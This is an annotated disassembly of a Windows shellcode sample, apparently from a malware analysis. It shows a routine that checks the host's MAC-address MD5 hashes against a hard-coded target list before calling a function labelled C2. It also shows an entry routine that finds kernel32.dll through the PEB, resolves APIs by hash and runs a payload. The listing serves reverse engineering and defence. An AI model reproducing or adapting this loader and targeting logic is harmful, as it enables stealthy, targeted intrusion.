;buffer LPVOID EAX ;XREF[1,0]: 00000f44
;mac_cnt2 uint EAX
;matched int EAX ;XREF[1,0]: 00000f87
;md5s_of_macs mac_md5_lis... -324
;md5s_of_th... mac_md5_lis... -350
;XREF[1,0]: 0000104e
ram:00000950 55 PUSH EBP
ram:00000951 8bec MOV EBP,ESP
ram:00000953 81ec4c030000 SUB ESP,0x34c
;fill the structure with MD5s of target MACs
ram:00000959 c785e4fcf... MOV dword ptr [0xfffffce4 + EBP],0xc706b000
ram:00000963 c785e8fcf... MOV dword ptr [0xfffffce8 + EBP],0xe6acb6da
ram:0000096d c785ecfcf... MOV dword ptr [0xfffffcec + EBP],0x99375cc2
ram:00000977 c785f0fcf... MOV dword ptr [0xfffffcf0 + EBP],0x146e2beb
ram:00000981 53 PUSH EBX
ram:00000982 56 PUSH ESI
ram:00000983 57 PUSH EDI
ram:00000984 8bf0 MOV ESI,func_ptrs
ram:00000986 33c0 XOR func_ptrs,func_ptrs
ram:00000988 6a02 PUSH 0x2
ram:0000098a 5a POP EDX
ram:0000098b 8995e0fcffff MOV dword ptr [0xfffffce0 + EBP],EDX
ram:00000991 8dbdf4fcffff LEA EDI,[0xfffffcf4 + EBP]
ram:00000997 ab STOSD ES:EDI
ram:00000998 c785f8fcf... MOV dword ptr [0xfffffcf8 + EBP],0xa3ba7759
ram:000009a2 c785fcfcf... MOV dword ptr [0xfffffcfc + EBP],0xa10ccef8
ram:000009ac c78500fdf... MOV dword ptr [0xfffffd00 + EBP],0xc96a6dc9
ram:000009b6 c78504fdf... MOV dword ptr [0xfffffd04 + EBP],0x919a0ca4
ram:000009c0 33c9 XOR ECX,ECX
ram:000009c2 41 INC ECX
ram:000009c3 8dbd08fdffff LEA EDI,[0xfffffd08 + EBP]
ram:000009c9 ab STOSD ES:EDI
ram:000009ca 898d0cfdffff MOV dword ptr [0xfffffd0c + EBP],ECX
ram:000009d0 c78510fdf... MOV dword ptr [0xfffffd10 + EBP],0xc706b000
ram:000009da c78514fdf... MOV dword ptr [0xfffffd14 + EBP],0xe6acb6da
ram:000009e4 c78518fdf... MOV dword ptr [0xfffffd18 + EBP],0x99375cc2
ram:000009ee c7851cfdf... MOV dword ptr [0xfffffd1c + EBP],0x146e2beb
ram:000009f8 33db XOR EBX,EBX
ram:000009fa 8dbd20fdffff LEA EDI,[0xfffffd20 + EBP]
ram:00000a00 ab STOSD ES:EDI
ram:00000a01 889d24fdffff MOV byte ptr [0xfffffd24 + EBP],BL
ram:00000a07 8dbd25fdffff LEA EDI,[0xfffffd25 + EBP]
ram:00000a0d ab STOSD ES:EDI
ram:00000a0e ab STOSD ES:EDI
ram:00000a0f ab STOSD ES:EDI
ram:00000a10 ab STOSD ES:EDI
ram:00000a11 66ab STOSW ES:EDI
ram:00000a13 aa STOSB ES:EDI
ram:00000a14 898d38fdffff MOV dword ptr [0xfffffd38 + EBP],ECX
ram:00000a1a c7853cfdf... MOV dword ptr [0xfffffd3c + EBP],0xeb8e9d40
ram:00000a24 c78540fdf... MOV dword ptr [0xfffffd40 + EBP],0xe54685ce
ram:00000a2e c78544fdf... MOV dword ptr [0xfffffd44 + EBP],0x40d70a6a
ram:00000a38 c78548fdf... MOV dword ptr [0xfffffd48 + EBP],0xbdad7a66
ram:00000a42 33c0 XOR func_ptrs,func_ptrs
ram:00000a44 8dbd4cfdffff LEA EDI,[0xfffffd4c + EBP]
ram:00000a4a ab STOSD ES:EDI
ram:00000a4b 889d50fdffff MOV byte ptr [0xfffffd50 + EBP],BL
ram:00000a51 8dbd51fdffff LEA EDI,[0xfffffd51 + EBP]
ram:00000a57 ab STOSD ES:EDI
ram:00000a58 ab STOSD ES:EDI
ram:00000a59 ab STOSD ES:EDI
ram:00000a5a ab STOSD ES:EDI
ram:00000a5b 66ab STOSW ES:EDI
ram:00000a5d aa STOSB ES:EDI
ram:00000a5e 898d64fdffff MOV dword ptr [0xfffffd64 + EBP],ECX
ram:00000a64 c78568fdf... MOV dword ptr [0xfffffd68 + EBP],0xd32da47d
ram:00000a6e c7856cfdf... MOV dword ptr [0xfffffd6c + EBP],0xe1d47445
ram:00000a78 c78570fdf... MOV dword ptr [0xfffffd70 + EBP],0x700eeaa7
ram:00000a82 c78574fdf... MOV dword ptr [0xfffffd74 + EBP],0xa6c97b8e
ram:00000a8c 33c0 XOR func_ptrs,func_ptrs
ram:00000a8e 8dbd78fdffff LEA EDI,[0xfffffd78 + EBP]
ram:00000a94 ab STOSD ES:EDI
ram:00000a95 889d7cfdffff MOV byte ptr [0xfffffd7c + EBP],BL
ram:00000a9b 8dbd7dfdffff LEA EDI,[0xfffffd7d + EBP]
ram:00000aa1 ab STOSD ES:EDI
ram:00000aa2 ab STOSD ES:EDI
ram:00000aa3 ab STOSD ES:EDI
ram:00000aa4 ab STOSD ES:EDI
ram:00000aa5 66ab STOSW ES:EDI
ram:00000aa7 aa STOSB ES:EDI
ram:00000aa8 33c0 XOR func_ptrs,func_ptrs
ram:00000aaa 8dbda4fdffff LEA EDI,[0xfffffda4 + EBP]
ram:00000ab0 899590fdffff MOV dword ptr [0xfffffd90 + EBP],EDX
ram:00000ab6 c78594fdf... MOV dword ptr [0xfffffd94 + EBP],0x252ae6ad
ram:00000ac0 c78598fdf... MOV dword ptr [0xfffffd98 + EBP],0x8411df7a
ram:00000aca c7859cfdf... MOV dword ptr [0xfffffd9c + EBP],0x91b2c518
ram:00000ad4 c785a0fdf... MOV dword ptr [0xfffffda0 + EBP],0x3e546732
ram:00000ade ab STOSD ES:EDI
ram:00000adf c785a8fdf... MOV dword ptr [0xfffffda8 + EBP],0xd6ae6842
ram:00000ae9 c785acfdf... MOV dword ptr [0xfffffdac + EBP],0xf2ffa54a
ram:00000af3 8895b0fdffff MOV byte ptr [0xfffffdb0 + EBP],DL
ram:00000af9 c785b1fdf... MOV dword ptr [0xfffffdb1 + EBP],0x7947240d
ram:00000b03 66c785b5f... MOV word ptr [0xfffffdb5 + EBP],DAT_00007d0d;= 17h
ram:00000b0c c685b7fdf... MOV byte ptr [0xfffffdb7 + EBP],0x32
ram:00000b13 8dbdb8fdffff LEA EDI,[0xfffffdb8 + EBP]
ram:00000b19 ab STOSD ES:EDI
ram:00000b1a 898dbcfdffff MOV dword ptr [0xfffffdbc + EBP],ECX
ram:00000b20 c785c0fdf... MOV dword ptr [0xfffffdc0 + EBP],0x3fc5147b
ram:00000b2a c785c4fdf... MOV dword ptr [0xfffffdc4 + EBP],0xc14c60d3
ram:00000b34 c785c8fdf... MOV dword ptr [0xfffffdc8 + EBP],0xf45acaeb
ram:00000b3e c785ccfdf... MOV dword ptr [0xfffffdcc + EBP],0xd5fe5a41
ram:00000b48 8dbdd0fdffff LEA EDI,[0xfffffdd0 + EBP]
ram:00000b4e ab STOSD ES:EDI
ram:00000b4f 889dd4fdffff MOV byte ptr [0xfffffdd4 + EBP],BL
ram:00000b55 8dbdd5fdffff LEA EDI,[0xfffffdd5 + EBP]
ram:00000b5b ab STOSD ES:EDI
ram:00000b5c ab STOSD ES:EDI
ram:00000b5d ab STOSD ES:EDI
ram:00000b5e ab STOSD ES:EDI
ram:00000b5f 66ab STOSW ES:EDI
ram:00000b61 aa STOSB ES:EDI
ram:00000b62 898de8fdffff MOV dword ptr [0xfffffde8 + EBP],ECX
ram:00000b68 c785ecfdf... MOV dword ptr [0xfffffdec + EBP],0x2ea68e3a
ram:00000b72 c785f0fdf... MOV dword ptr [0xfffffdf0 + EBP],0xbeecb432
ram:00000b7c c785f4fdf... MOV dword ptr [0xfffffdf4 + EBP],0xa50df33
ram:00000b86 c785f8fdf... MOV dword ptr [0xfffffdf8 + EBP],0x73c8eb28
ram:00000b90 33c0 XOR func_ptrs,func_ptrs
ram:00000b92 8dbdfcfdffff LEA EDI,[0xfffffdfc + EBP]
ram:00000b98 ab STOSD ES:EDI
ram:00000b99 889d00feffff MOV byte ptr [0xfffffe00 + EBP],BL
ram:00000b9f 8dbd01feffff LEA EDI,[0xfffffe01 + EBP]
ram:00000ba5 ab STOSD ES:EDI
ram:00000ba6 ab STOSD ES:EDI
ram:00000ba7 ab STOSD ES:EDI
ram:00000ba8 ab STOSD ES:EDI
ram:00000ba9 66ab STOSW ES:EDI
ram:00000bab aa STOSB ES:EDI
ram:00000bac 898d14feffff MOV dword ptr [0xfffffe14 + EBP],ECX
ram:00000bb2 c78518fef... MOV dword ptr [0xfffffe18 + EBP],0x6c9516cc
ram:00000bbc c7851cfef... MOV dword ptr [0xfffffe1c + EBP],0x2bcd0695
ram:00000bc6 c78520fef... MOV dword ptr [0xfffffe20 + EBP],0xd7a789b3
ram:00000bd0 c78524fef... MOV dword ptr [0xfffffe24 + EBP],0xbd3324da
ram:00000bda 33c0 XOR func_ptrs,func_ptrs
ram:00000bdc 8dbd28feffff LEA EDI,[0xfffffe28 + EBP]
ram:00000be2 ab STOSD ES:EDI
ram:00000be3 889d2cfeffff MOV byte ptr [0xfffffe2c + EBP],BL
ram:00000be9 8dbd2dfeffff LEA EDI,[0xfffffe2d + EBP]
ram:00000bef ab STOSD ES:EDI
ram:00000bf0 ab STOSD ES:EDI
ram:00000bf1 ab STOSD ES:EDI
ram:00000bf2 ab STOSD ES:EDI
ram:00000bf3 66ab STOSW ES:EDI
ram:00000bf5 aa STOSB ES:EDI
ram:00000bf6 33c0 XOR func_ptrs,func_ptrs
ram:00000bf8 899540feffff MOV dword ptr [0xfffffe40 + EBP],EDX
ram:00000bfe c78544fef... MOV dword ptr [0xfffffe44 + EBP],0x64cc4cfe
ram:00000c08 c78548fef... MOV dword ptr [0xfffffe48 + EBP],0xa6539215
ram:00000c12 888d4cfeffff MOV byte ptr [0xfffffe4c + EBP],CL
ram:00000c18 c7854dfef... MOV dword ptr [0xfffffe4d + EBP],0x71f10493
ram:00000c22 889551feffff MOV byte ptr [0xfffffe51 + EBP],DL
ram:00000c28 66c78552f... MOV word ptr [0xfffffe52 + EBP],DAT_00006d88;= F8h
ram:00000c31 8dbd54feffff LEA EDI,[0xfffffe54 + EBP]
ram:00000c37 ab STOSD ES:EDI
ram:00000c38 c78558fef... MOV dword ptr [0xfffffe58 + EBP],0x7c341f2
ram:00000c42 c7855cfef... MOV dword ptr [0xfffffe5c + EBP],0x7477573a
ram:00000c4c c78560fef... MOV dword ptr [0xfffffe60 + EBP],0x7214342c
ram:00000c56 c78564fef... MOV dword ptr [0xfffffe64 + EBP],0xec3ed4e2
ram:00000c60 8dbd68feffff LEA EDI,[0xfffffe68 + EBP]
ram:00000c66 ab STOSD ES:EDI
ram:00000c67 898d6cfeffff MOV dword ptr [0xfffffe6c + EBP],ECX
ram:00000c6d c78570fef... MOV dword ptr [0xfffffe70 + EBP],0x4a56c24e
ram:00000c77 c78574fef... MOV dword ptr [0xfffffe74 + EBP],0xc52d98ce
ram:00000c81 c78578fef... MOV dword ptr [0xfffffe78 + EBP],0xbf39108c
ram:00000c8b c7857cfef... MOV dword ptr [0xfffffe7c + EBP],0x3ca86e6d
ram:00000c95 8dbd80feffff LEA EDI,[0xfffffe80 + EBP]
ram:00000c9b ab STOSD ES:EDI
ram:00000c9c 889d84feffff MOV byte ptr [0xfffffe84 + EBP],BL
ram:00000ca2 8dbd85feffff LEA EDI,[0xfffffe85 + EBP]
ram:00000ca8 ab STOSD ES:EDI
ram:00000ca9 ab STOSD ES:EDI
ram:00000caa ab STOSD ES:EDI
ram:00000cab ab STOSD ES:EDI
ram:00000cac 66ab STOSW ES:EDI
ram:00000cae aa STOSB ES:EDI
ram:00000caf 899598feffff MOV dword ptr [0xfffffe98 + EBP],EDX
ram:00000cb5 c7859cfef... MOV dword ptr [0xfffffe9c + EBP],0x9eef0cab
ram:00000cbf c785a0fef... MOV dword ptr [0xfffffea0 + EBP],0x9e125759
ram:00000cc9 c785a4fef... MOV dword ptr [0xfffffea4 + EBP],0x78a1fb23
ram:00000cd3 c785a8fef... MOV dword ptr [0xfffffea8 + EBP],0xba20f12
ram:00000cdd 33c0 XOR func_ptrs,func_ptrs
ram:00000cdf 8dbdacfeffff LEA EDI,[0xfffffeac + EBP]
ram:00000ce5 ab STOSD ES:EDI
ram:00000ce6 66c785b0f... MOV word ptr [0xfffffeb0 + EBP],DAT_000058f7;= 53h S
ram:00000cef 8895b2feffff MOV byte ptr [0xfffffeb2 + EBP],DL
ram:00000cf5 c785b3fef... MOV dword ptr [0xfffffeb3 + EBP],0x7740734e
ram:00000cff c785b7fef... MOV dword ptr [0xfffffeb7 + EBP],0xe93205c7
ram:00000d09 8895bbfeffff MOV byte ptr [0xfffffebb + EBP],DL
ram:00000d0f 66c785bcf... MOV word ptr [0xfffffebc + EBP],DAT_0000c551;= D1h
ram:00000d18 c685befef... MOV byte ptr [0xfffffebe + EBP],0xdf
ram:00000d1f 8895bffeffff MOV byte ptr [0xfffffebf + EBP],DL
ram:00000d25 8dbdc0feffff LEA EDI,[0xfffffec0 + EBP]
ram:00000d2b ab STOSD ES:EDI
ram:00000d2c 898dc4feffff MOV dword ptr [0xfffffec4 + EBP],ECX
ram:00000d32 c785c8fef... MOV dword ptr [0xfffffec8 + EBP],0x61605af3
ram:00000d3c c785ccfef... MOV dword ptr [0xfffffecc + EBP],0xde36b37a
ram:00000d46 c785d0fef... MOV dword ptr [0xfffffed0 + EBP],0x99c7aa4d
ram:00000d50 c785d4fef... MOV dword ptr [0xfffffed4 + EBP],0xb6076d67
ram:00000d5a 8dbdd8feffff LEA EDI,[0xfffffed8 + EBP]
ram:00000d60 ab STOSD ES:EDI
ram:00000d61 889ddcfeffff MOV byte ptr [0xfffffedc + EBP],BL
ram:00000d67 8dbdddfeffff LEA EDI,[0xfffffedd + EBP]
ram:00000d6d ab STOSD ES:EDI
ram:00000d6e ab STOSD ES:EDI
ram:00000d6f ab STOSD ES:EDI
ram:00000d70 ab STOSD ES:EDI
ram:00000d71 66ab STOSW ES:EDI
ram:00000d73 aa STOSB ES:EDI
ram:00000d74 898df0feffff MOV dword ptr [0xfffffef0 + EBP],ECX
ram:00000d7a c785f4fef... MOV dword ptr [0xfffffef4 + EBP],0xd8ea626a
ram:00000d84 888df8feffff MOV byte ptr [0xfffffef8 + EBP],CL
ram:00000d8a c785f9fef... MOV dword ptr [0xfffffef9 + EBP],0x9e5c2a80
ram:00000d94 c785fdfef... MOV dword ptr [0xfffffefd + EBP],0xc1d028c8
ram:00000d9e 66c78501f... MOV word ptr [0xffffff01 + EBP],DAT_0000bbed;= C5h
ram:00000da7 c68503fff... MOV byte ptr [0xffffff03 + EBP],0x5b
ram:00000dae 33c0 XOR func_ptrs,func_ptrs
ram:00000db0 8dbd04ffffff LEA EDI,[0xffffff04 + EBP]
ram:00000db6 ab STOSD ES:EDI
ram:00000db7 889d08ffffff MOV byte ptr [0xffffff08 + EBP],BL
ram:00000dbd 8dbd09ffffff LEA EDI,[0xffffff09 + EBP]
ram:00000dc3 ab STOSD ES:EDI
ram:00000dc4 ab STOSD ES:EDI
ram:00000dc5 ab STOSD ES:EDI
ram:00000dc6 ab STOSD ES:EDI
ram:00000dc7 66ab STOSW ES:EDI
ram:00000dc9 aa STOSB ES:EDI
ram:00000dca 898d1cffffff MOV dword ptr [0xffffff1c + EBP],ECX
ram:00000dd0 c78520fff... MOV dword ptr [0xffffff20 + EBP],0x527b0c60
ram:00000dda c78524fff... MOV dword ptr [0xffffff24 + EBP],0x3208f8e7
ram:00000de4 c78528fff... MOV dword ptr [0xffffff28 + EBP],0x4fe8cee3
ram:00000dee c7852cfff... MOV dword ptr [0xffffff2c + EBP],0x9d8bc8ce
ram:00000df8 33c0 XOR func_ptrs,func_ptrs
ram:00000dfa 8dbd30ffffff LEA EDI,[0xffffff30 + EBP]
ram:00000e00 ab STOSD ES:EDI
ram:00000e01 889d34ffffff MOV byte ptr [0xffffff34 + EBP],BL
ram:00000e07 8dbd35ffffff LEA EDI,[0xffffff35 + EBP]
ram:00000e0d ab STOSD ES:EDI
ram:00000e0e ab STOSD ES:EDI
ram:00000e0f ab STOSD ES:EDI
ram:00000e10 ab STOSD ES:EDI
ram:00000e11 66ab STOSW ES:EDI
ram:00000e13 aa STOSB ES:EDI
ram:00000e14 33c0 XOR func_ptrs,func_ptrs
ram:00000e16 8dbd5cffffff LEA EDI,[0xffffff5c + EBP]
ram:00000e1c 899548ffffff MOV dword ptr [0xffffff48 + EBP],EDX
ram:00000e22 c7854cfff... MOV dword ptr [0xffffff4c + EBP],0xd7b2756e
ram:00000e2c c78550fff... MOV dword ptr [0xffffff50 + EBP],0x64980e47
ram:00000e36 c78554fff... MOV dword ptr [0xffffff54 + EBP],0xcb489ed1
ram:00000e40 c78558fff... MOV dword ptr [0xffffff58 + EBP],0x64af0c36
ram:00000e4a ab STOSD ES:EDI
ram:00000e4b c78560fff... MOV dword ptr [0xffffff60 + EBP],0xcd9b55fb
ram:00000e55 c78564fff... MOV dword ptr [0xffffff64 + EBP],0xfce03e10
ram:00000e5f c78568fff... MOV dword ptr [0xffffff68 + EBP],0x6141cfb0
ram:00000e69 c7856cfff... MOV dword ptr [0xffffff6c + EBP],0x19fbfab0
ram:00000e73 8dbd70ffffff LEA EDI,[0xffffff70 + EBP]
ram:00000e79 ab STOSD ES:EDI
ram:00000e7a 898d74ffffff MOV dword ptr [0xffffff74 + EBP],ECX
ram:00000e80 c78578fff... MOV dword ptr [0xffffff78 + EBP],0x1ed60a69
ram:00000e8a c7857cfff... MOV dword ptr [0xffffff7c + EBP],0x99a85c7
ram:00000e94 c74580642... MOV dword ptr [EBP + -0x80],0x666b2164
ram:00000e9b c74584b5d... MOV dword ptr [EBP + -0x7c],0x1a3bd3b5
ram:00000ea2 8d7d88 LEA EDI,[EBP + -0x78]
ram:00000ea5 ab STOSD ES:EDI
ram:00000ea6 885d8c MOV byte ptr [EBP + -0x74],BL
ram:00000ea9 8d7d8d LEA EDI,[EBP + -0x73]
ram:00000eac ab STOSD ES:EDI
ram:00000ead ab STOSD ES:EDI
ram:00000eae ab STOSD ES:EDI
ram:00000eaf ab STOSD ES:EDI
ram:00000eb0 66ab STOSW ES:EDI
ram:00000eb2 aa STOSB ES:EDI
ram:00000eb3 8955a0 MOV dword ptr [EBP + -0x60],EDX
ram:00000eb6 c745a409d... MOV dword ptr [EBP + -0x5c],0xf39dda09
ram:00000ebd c745a8a05... MOV dword ptr [EBP + -0x58],0xadaf50a0
ram:00000ec4 c745ac0df... MOV dword ptr [EBP + -0x54],0x96eff00d
ram:00000ecb c745b03b4... MOV dword ptr [EBP + -0x50],0xe2b6413b
ram:00000ed2 33c0 XOR func_ptrs,func_ptrs
ram:00000ed4 8d7db4 LEA EDI,[EBP + -0x4c]
ram:00000ed7 ab STOSD ES:EDI
ram:00000ed8 c745b8fae... MOV dword ptr [EBP + -0x48],0x6ab0e3fa
ram:00000edf c745bcb27... MOV dword ptr [EBP + -0x44],0xf2b7fb2
ram:00000ee6 c745c07c2... MOV dword ptr [EBP + -0x40],0x7fbf297c
ram:00000eed c745c42b0... MOV dword ptr [EBP + -0x3c],0x3ff8032b
ram:00000ef4 8d7dc8 LEA EDI,[EBP + -0x38]
ram:00000ef7 ab STOSD ES:EDI
ram:00000ef8 894dcc MOV dword ptr [EBP + -0x34],ECX
ram:00000efb c745d0d4b... MOV dword ptr [EBP + -0x30],0x6758b9d4
ram:00000f02 c745d41f4... MOV dword ptr [EBP + -0x2c],0x5dbf471f
ram:00000f09 c745d8cd0... MOV dword ptr [EBP + -0x28],0x5d7008cd
ram:00000f10 c745dc80d... MOV dword ptr [EBP + -0x24],0x539ade80
ram:00000f17 8d7de0 LEA EDI,[EBP + -0x20]
ram:00000f1a ab STOSD ES:EDI
ram:00000f1b 885de4 MOV byte ptr [EBP + -0x1c],BL
ram:00000f1e 8d7de5 LEA EDI,[EBP + -0x1b]
ram:00000f21 ab STOSD ES:EDI
ram:00000f22 ab STOSD ES:EDI
ram:00000f23 ab STOSD ES:EDI
ram:00000f24 ab STOSD ES:EDI
ram:00000f25 66ab STOSW ES:EDI
ram:00000f27 51 PUSH ECX
ram:00000f28 53 PUSH EBX
ram:00000f29 aa STOSB ES:EDI
ram:00000f2a e8b2f3ffff CALL md5_mac ;int md5_mac(void * buffer, int only_...
ram:00000f2f 59 POP ECX
ram:00000f30 59 POP ECX
ram:00000f31 3bc3 CMP mac_cnt,EBX
ram:00000f33 7671 JBE LAB_00000fa6
ram:00000f35 8d7805 LEA EDI,[mac_cnt + 0x5]
ram:00000f38 6bff14 IMUL dwSize,dwSize,0x14
ram:00000f3b 6a04 PUSH 0x4
ram:00000f3d 6800300000 PUSH DAT_00003000 ;= 80h
ram:00000f42 57 PUSH dwSize
ram:00000f43 53 PUSH EBX
ram:00000f44 ff5604 CALL dword ptr [ESI + 0x4]
ram:00000f47 57 PUSH dwSize
ram:00000f48 53 PUSH EBX
ram:00000f49 50 PUSH buffer
ram:00000f4a 8945fc MOV dword ptr [EBP + -0x4],buffer
ram:00000f4d ff5624 CALL dword ptr [ESI + 0x24]
ram:00000f50 83c40c ADD ESP,0xc
ram:00000f53 53 PUSH EBX
ram:00000f54 ff75fc PUSH dword ptr [EBP + -0x4]
ram:00000f57 e885f3ffff CALL md5_mac ;int md5_mac(void * buffer, int only_...
ram:00000f5c 8bf8 MOV dwSize,mac_cnt2
ram:00000f5e 59 POP ECX
ram:00000f5f 59 POP ECX
ram:00000f60 3bfb CMP dwSize,EBX
ram:00000f62 7642 JBE LAB_00000fa6
ram:00000f64 6a2c PUSH 0x2c
ram:00000f66 8d85b4fcffff LEA mac_cnt2,[0xfffffcb4 + EBP]
ram:00000f6c 53 PUSH EBX
ram:00000f6d 50 PUSH mac_cnt2
ram:00000f6e ff5624 CALL dword ptr [ESI + 0x24]
ram:00000f71 83c40c ADD ESP,0xc
ram:00000f74 8d85b4fcffff LEA mac_cnt2,[0xfffffcb4 + EBP]
ram:00000f7a 50 PUSH mac_cnt2
ram:00000f7b 57 PUSH dwSize
ram:00000f7c ff75fc PUSH dword ptr [EBP + -0x4]
ram:00000f7f 8d85e0fcffff LEA mac_cnt2,[0xfffffce0 + EBP]
ram:00000f85 50 PUSH mac_cnt2
ram:00000f86 56 PUSH ESI
ram:00000f87 e8a3f5ffff CALL cmp_md5 ;int cmp_md5(func_ptr_table_t * func_...
ram:00000f8c 83c414 ADD ESP,0x14
ram:00000f8f 85c0 TEST matched,matched
ram:00000f91 740e JZ LAB_00000fa1
ram:00000f93 8d85b4fcffff LEA matched,[0xfffffcb4 + EBP]
ram:00000f99 50 PUSH matched
ram:00000f9a e8d8f3ffff CALL C2 ;void C2(mac_md5_list_entry_t * md5s_...
ram:00000f9f eb05 JMP LAB_00000fa6
LAB_00000fa1: ;XREF[1,0]: 00000f91
ram:00000fa1 e8a6f6ffff CALL no_match ;void no_match(func_ptr_table_t * fun...
LAB_00000fa6: ;XREF[3,0]: 00000f33,00000f62,00000f9f
ram:00000fa6 5f POP dwSize
ram:00000fa7 5e POP ESI
ram:00000fa8 5b POP EBX
ram:00000fa9 c9 LEAVE
ram:00000faa c3 RET
;********************************************************************************************************
;* SHELLCODE ENTRY FUNCTION this will: *
;* 1. Get kernel32.dll *
;* 2. resolve imports *
;* 3. execute payload *
;********************************************************************************************************
;int entry(void)
;local_FS_O... NT_TIB * FS_O...
;ldr_entry _LDR_DATA_T... ECX ;XREF[1,0]: 00000fcb
;GetProcAdd... int EAX ;XREF[1,0]: 00001028
;import_res... int EAX ;XREF[1,0]: 00001040
;kernel32_d... void * -c ;XREF[1,0]: 00001038
;func_ptr_t... int[21] -60 ;XREF[3,0]: 00001033,0000103c,0000104a
;local_64 LDR_DATA_TA... -64 ;XREF[1,0]: 00001004
;flink _LIST_ENTRY * HASH...
;dll_name wchar_t * HASH...
;next_entry _LDR_DATA_T... HASH...
ram:00000fab 55 PUSH EBP
ram:00000fac 8bec MOV EBP,ESP
ram:00000fae 83e4f8 AND ESP,0xfffffff8
ram:00000fb1 83ec60 SUB ESP,0x60
ram:00000fb4 56 PUSH ESI
ram:00000fb5 57 PUSH EDI
ram:00000fb6 64a118000000 MOV EAX,FS:[0x18]
ram:00000fbc 8b4030 MOV EAX,dword ptr [EAX + 0x30]
ram:00000fbf 8b400c MOV EAX,dword ptr [EAX + 0xc]
;1. get kernel32.dll
;1.1. iterate over InInitializationOrderModuleList
;1.2. match 1th, 6th and 9th character of module with `k`, `l`, `.` ... this matches `kernel32.dll`
ram:00000fc2 8b401c MOV EAX,dword ptr [EAX + 0x1c]
ram:00000fc5 8b08 MOV ECX,dword ptr [EAX]
ram:00000fc7 3bc8 CMP ECX,EAX
ram:00000fc9 7439 JZ LAB_00001004
LAB_00000fcb: ;XREF[1,0]: 00001000
ram:00000fcb 8d41f0 LEA EAX,[ldr_entry + -0x10]
ram:00000fce 6683782c00 CMP word ptr [EAX + 0x2c],0x0
ram:00000fd3 7433 JZ LAB_00001008
;match the name of the module by comparing the 1st, 6th and 9th characters. This matches kernel32.dll
ram:00000fd5 8b5030 MOV EDX,dword ptr [EAX + 0x30]
ram:00000fd8 0fb732 MOVZX ESI,word ptr [EDX]
ram:00000fdb 83fe6b CMP ESI,0x6b
ram:00000fde 7405 JZ LAB_00000fe5
ram:00000fe0 83fe4b CMP ESI,0x4b
ram:00000fe3 7515 JNZ LAB_00000ffa
LAB_00000fe5: ;XREF[1,0]: 00000fde
ram:00000fe5 0fb7720a MOVZX ESI,word ptr [EDX + 0xa]
ram:00000fe9 83fe6c CMP ESI,0x6c
ram:00000fec 7405 JZ LAB_00000ff3
ram:00000fee 83fe4c CMP ESI,0x4c
ram:00000ff1 7507 JNZ LAB_00000ffa
LAB_00000ff3: ;XREF[1,0]: 00000fec
ram:00000ff3 66837a102e CMP word ptr [EDX + 0x10],0x2e
ram:00000ff8 740e JZ LAB_00001008
LAB_00000ffa: ;XREF[2,0]: 00000fe3,00000ff1
ram:00000ffa 8bd1 MOV EDX,ldr_entry
ram:00000ffc 8b0a MOV ldr_entry,dword ptr [EDX]
ram:00000ffe 3bca CMP ldr_entry,EDX
ram:00001000 75c9 JNZ LAB_00000fcb
ram:00001002 eb04 JMP LAB_00001008
LAB_00001004: ;XREF[1,0]: 00000fc9
ram:00001004 8b44240c MOV EAX,dword ptr [ESP + local_64+0x70]
;get the dll base (in this case of the matched kernel32.dll)
LAB_00001008: ;XREF[3,0]: 00000fd3,00000ff8,00001002
ram:00001008 8b7018 MOV ESI,dword ptr [EAX + 0x18]
;resolve LoadLibraryExW via the hash 431a42c9 and store in func_ptr_table[0]
;also resolve c2cbc15a = GetProcAddress
ram:0000100b 85f6 TEST ESI,ESI
ram:0000100d 7444 JZ LAB_00001053
ram:0000100f 68c9421a43 PUSH 0x431a42c9
ram:00001014 56 PUSH ESI
ram:00001015 e8f6efffff CALL getAddrByHash ;int getAddrByHash(IMAGE_DOS_HEADER *...
ram:0000101a 8bf8 MOV EDI,EAX
ram:0000101c 59 POP ldr_entry
ram:0000101d 59 POP ldr_entry
ram:0000101e 85ff TEST EDI,EDI
ram:00001020 7431 JZ LAB_00001053
ram:00001022 685ac1cbc2 PUSH 0xc2cbc15a
ram:00001027 56 PUSH ESI
ram:00001028 e8e3efffff CALL getAddrByHash ;int getAddrByHash(IMAGE_DOS_HEADER *...
ram:0000102d 59 POP ldr_entry
ram:0000102e 59 POP ldr_entry
ram:0000102f 85c0 TEST GetProcAddress,GetProcAddress
ram:00001031 7420 JZ LAB_00001053
ram:00001033 8d442410 LEA GetProcAddress=>...,[ESP + 0x10]
ram:00001037 50 PUSH GetProcAddress
ram:00001038 89742468 MOV dword ptr [ESP +...,ESI
ram:0000103c 897c2414 MOV dword ptr [ESP +...,EDI
;resolve the imports
ram:00001040 e855f0ffff CALL import_resolution ;undefined import_resolution(func_ptr...
ram:00001045 59 POP ldr_entry
ram:00001046 85c0 TEST import_resolutio...,import_resolution...
ram:00001048 740c JZ LAB_00001056
ram:0000104a 8d442410 LEA import_resolutio...,[ESP + 0x10]
;execute the payload
;
ram:0000104e e8fdf8ffff CALL payload ;void payload(func_ptr_table_t * func...
LAB_00001053: ;XREF[3,0]: 0000100d,00001020,00001031
ram:00001053 33c0 XOR import_resolutio...,import_resolution...
ram:00001055 40 INC import_resolution_success
LAB_00001056: ;XREF[1,0]: 00001048
ram:00001056 5f POP EDI
ram:00001057 5e POP ESI
ram:00001058 8be5 MOV ESP,EBP
ram:0000105a 5d POP EBP
ram:0000105b c3 RET